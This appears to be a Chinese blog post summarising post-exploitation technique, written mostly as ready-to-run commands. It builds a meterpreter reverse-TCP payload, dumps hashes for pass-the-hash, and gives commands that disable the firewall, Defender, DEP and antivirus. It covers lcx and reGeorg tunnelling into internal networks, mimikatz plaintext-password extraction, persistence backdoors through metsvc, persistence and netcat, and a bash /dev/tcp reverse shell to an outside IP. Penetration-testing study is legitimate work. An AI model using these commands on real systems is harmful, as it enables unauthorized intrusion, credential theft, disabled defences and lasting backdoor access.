后渗透阶段总结(提权+信息收集+内外渗透+后门)

竟然是后渗透了 前期先搞个上个马吧,这两天总结的一些,渗透比开发好玩啊哈哈哈~

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.17.30 lport=4444 -b '\x00' -e x86\shikata_ga_nai  -f exe > msf.exe 
-b排除垃圾字符  -e编码  -f生成的文件

python -m SimpleHTTPServer 800
把当前的生成文件路径映射一个http 800地址给靶机下载访问 

msf  开启监听 use exploit/multi/handler

1: 权限提升:提权

(1)windows:
1:systeminfo查看补丁 2:sc命令(从administrator-system)  3:UAC权限机制(msf:ask,bypassuac等机制) 4: 不带引号的服务路径 
(2)linux:
1:内核提权(uname -a)   2:suid提权(cp ,find,vim)  3:c文件编译后执行提权 4:定时任务提权   5:token欺骗
(3)mysql :
1 :udf提权(udf扩展程序)   2: mof(写入代码,让SQL执行,多少时间执行一次)   3:启动项(写入vbs)

2:信息收集:服务器信息,sniff数据包(svn,http,ftp等) ,hash,关闭防火墙杀毒软件

(1)服务器信息收集
post模块
run post/windows/gather/xxxxxxx ==>forensics/ , checkVM
获取磁盘信息    enum_drives
是否是虚拟机     checkVM
对应的程序服务    tasklist,  run post/windows/gather/enum_services
安装的应用  run post/windows/gather/enum_applications
查看共享    run post/windows/gather/enum_share
查看补丁    run post/windows/gather/enum_patches
(2)sniffer数据包捕获(通过网络嗅探数据包的捕获,http登陆密码,ftp,svn)
image.png
加载sniffer模块 ==> load sniffer ===>help
查看网卡信息sniffer_interface 
开启监听 : sniffer_start 1
导出数据包:sniffer_dump 1 1.cap  可以再次通过kali的wireshark分析包
后渗透阶段总结(提权+信息收集+内外渗透+后门)_第1张图片
image.png

数据导出可以通过wirashark分析包 其次也可以通过msf下面的这个模块进行分析包

use auxiliary/sniffer/psnuffle 设置导出cap的路径
image.png
(3)PassingTheHash

获取hash值

第一种system情况下 : hashdump
第二种:post模块后渗透模块中run post/windows/gather/hashdump
第三种:run post/windows/gather/smart_hashdump
第三种的优势在于会从系统的角度判断获取hash这个好

Hash传递 (使用hash值传递也可以登录)

exploit/windows/smb/psexec
(4)关闭防火墙以及杀毒软件开启远程桌面服务

关闭防火墙Netsh (管理员及以上权限) shell 后需要进入windows中

netsh advfirewall set allprofiles state off

关闭Denfender (windows自带杀毒软件) shell 后需要进入windows中

先进入services.msc  可以看到windefend启动
Net stop windefend

关闭Dep( 关闭软硬件数据防护 : 安全机制,阻止威胁代码) shell 后需要进入windows中

bcdedit.exe /set {current} nx AlwaysOff

关闭杀毒软件(第三方的) kali的脚本

run killav
run post/windows/manage/killava

开启远程桌面(两种方式)

第一种:
run post/windows/manage/enable_rdp
上面执行后会又告诉你怎么关闭远程桌面,这个命令会写入一个文本中
使用 run multi_console_command -r 文本的路径
第二种:
run getgui -e

桌面截图(会自动保存) : screenshop
查看图片  eog  路径

登陆远程桌面
rdesktop -u root -p root  ip

3 :内网渗透:开启3389 ,端口转发,代理/跳跳板攻击:

利用已被入侵的主机作为跳板来攻击网络中其他的系统 1是为了访问服务器的内网机器攻击 2是为了隐藏自己做跳板板

windows

(1)开启3389
查看 regedit

计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

开启 (注册表 , vbs , exe软件开启等)

http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html

(2)服务器端口被修改如何查找
1:通过大马读取 2:通过注册表查看


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第2张图片
image.png

(3)目标机处于内网如何连接3389(前提是有公网提供反弹)

把目标机的3389端口转发到公网IP的2222端口
通过lcx工具解决内网远程连接

        Webshell上执行:lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389 (将本机3389端口流量转发到公网ip的2222端口上去)

        自己的电脑里面执行:lcx.exe -listen 2222 4444 (监听本地的2222端口将流量转发到4444 )
 然后本地连接127.0.0.1 444端口就进入到了目标机

(5)内网到内网 socket5代理 ,内网到内网渗透
reGeorg-master ,上传webshell, tunnel.nosocket.php
1:建立与目标机链接 本地9999端口与目标机链接

python reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.17.106:8989/tunnel.nosocket.php

2:进行socket代理设置(因为要进行内网的服务器进行扫描)
安装setup.exe 打开proxifier代理软件


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第3张图片
image.png

(6)如何找出双网卡的机器
利用finsubnet.py文件

python finsubnet.py -i 192.168.1.1-192.168.1.254

linux

(1)进入渗透的机器ipconfig可以得到对方服务器 使用了几张网卡, 如果用其它网卡网段的可以切换成其它网段的网卡
可以用run autoroute -s 192.168.x.0/24 新:post /multi/manage/autoroute 
run autoroute -p 查看当前路由表信息已切换到 x 网段 (注意需要下面的操作需要切换网段)

扫码x网段
run post/windows/gather/arp-scanner Rhosts=192.168.x.0/24

扫描x网段IP开放的端口
use auxiliary/scanner/tcp  ==>设置对应的IP 线程等
后渗透阶段总结(提权+信息收集+内外渗透+后门)_第4张图片
image.png
(2) proxychains代理设置

socket代理:auxiliary/ server/socks4a 设置对应的目标机的代理 run一下
然后会提示开启成功socket 并存在jobs中

配置本地代理 vi /etc/proxychains.conf 最下面加上 socks4 192.168.x.xx 端口 和上面的端口保持一致
然后可以不需要在msf中进行严格域内的扫描了,当前攻击机就相当于在域内了

proxychains nmap -sT -sV -Pn -n -p22,80,139,445  192.168.x.xx
(3) 如果在目标机的域内渗透进去了也设置了代理,如果再往里面一次怎么办?

进入到目标机域内的服务器后此时session会话已经是2了, 在当前2的会话进行跳板机,session 2
ifconfig,发现还有一层网卡, run post/windows/gather/arp-scanner rhost 192.168.xx.0/24扫码新 发现的 这层网卡的存活主机
添加路由

 使用新的脚本post/multi/manage/autoroute

run autoroute -p 查看当前路由 发现有两层路由


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第5张图片
image.png

后渗透阶段总结(提权+信息收集+内外渗透+后门)_第6张图片
image.png
(4) 通过代理去做一些事情

去链接这些域内的机器

proxychains ssh [email protected]

浏览器也可以登录域内的站点


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第7张图片
image.png
(4) mimikatz获取明文密码 : 使用这个得是system权限
后渗透阶段总结(提权+信息收集+内外渗透+后门)_第8张图片
image.png

(一) :加载load mimikatz


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第9张图片
image.png

(二):获取明文密码 wdigest


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第10张图片
image.png

(三)::mimikatz-command -f
mimikatz-command -f system::compoter 获取主机名
mimikatz-command -f system::system     获取系统用户
mimikatz-command -f samdump::hashes 获取hash值
mimikatz-command -f process::         进程的操作

扫雷也可以显示出来


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第11张图片
image.png

4:后门植入:永久后门维持权限

1: msterpreter (存储内存)

(一) 第一种 metsvc (不推荐 ,shell运行与内存中(难被发现),重启即失效 31337端口固定得先关闭UAC啥的,参考2)
先获取一个shell ,进入meterpreter

run metsvc -h   //估计新得用后渗透阶段的post/windows/manage/persistence_exe
run metsvc -A   自动植入后门了 , 端口是31337,自动生成一个直连的tcp

(二) 第一种 persistence (推荐 : 启动型启动 ,特性:定期会连,系统启动时回连,自动运行)

Run persistence -X(开启运行) -A -S -U(用户登录运行) -i(时间执行) 60 -p 4321 -r ip
2: Nc后门 (存储文件)

第一步简单来说把nc传到目标机并设置全局可访问),如果用户连接4444端口就可以拿到一个shell


后渗透阶段总结(提权+信息收集+内外渗透+后门)_第12张图片
image.png

image.png

后渗透阶段总结(提权+信息收集+内外渗透+后门)_第13张图片
image.png

后渗透阶段总结(提权+信息收集+内外渗透+后门)_第14张图片
image.png
nc(瑞士军刀)的操作其实分为反弹shell 和 bash直接反弹
第一种:nc -lvvp 9999 -t -e /bin/bash  
nc瑞士军刀 -l本地监听 -vv详细信息 -p端口    开启本地端口发布出去
windows可使用 nc.exe ip 9999链接linux

第二种bash直接反弹
1.bash -i >& /dev/tcp/192.168.17.71/8080 0>&1
2.本地 nc -l -p 8080

说说你是如何做内网渗透的?

第一种方法:在具备Webshell的情况下,通过Webshell直接上传CS木马到对方服务器运行,在CS软件上面开启SocksProxy代理,把kail直接通过cs socksProxy代理攻击内网进行横向渗透。

第二种方法:通过reGeorg+Proxifier进行内网渗透,把tunnel.nosocket.php脚本通过Webshell上传到Web站点目录进行访问,在本地自己电脑上面执行reGeorgSocksProxy.py -p 9999 –u http://IP地址/tunnel.nosocket.php,最后配置Proxifier本地代理地址与端口进行横向内网渗透。

内网横向渗透一般攻击技巧有:

1、通过nmap、nessus扫描整个内网ip主机漏洞,如如ms08-067、ms17-010、ms12-020、ms15-035、ms19-0708、永恒之蓝2代、cve-2017-7494(samba)、cve-2014-6271(破壳)、php cgi等相关漏洞。
2、通过nmap扫内网80、8080端口,看内网是否存在大量Web站点,如果存在进行手工或工具对Web站点进行漏洞检测,如注入、命令执行、反序列化、文件上传、弱口令等相关漏洞。
3、通过ntscan、Bruter、hydra工具对内网弱口令探测,如果发现一个服务器弱口令,可以通过这个弱口令跑整个内网,一般密码一样。
4、适当的对内网主机进行ARP抓取密码。
5、如果内网有AD域的情况下,可以通过MS14-068漏洞、黄金票据、白银票据进行域控攻击,拿下域控就等于基本拿下整个内网。

你可能感兴趣的:(后渗透阶段总结(提权+信息收集+内外渗透+后门))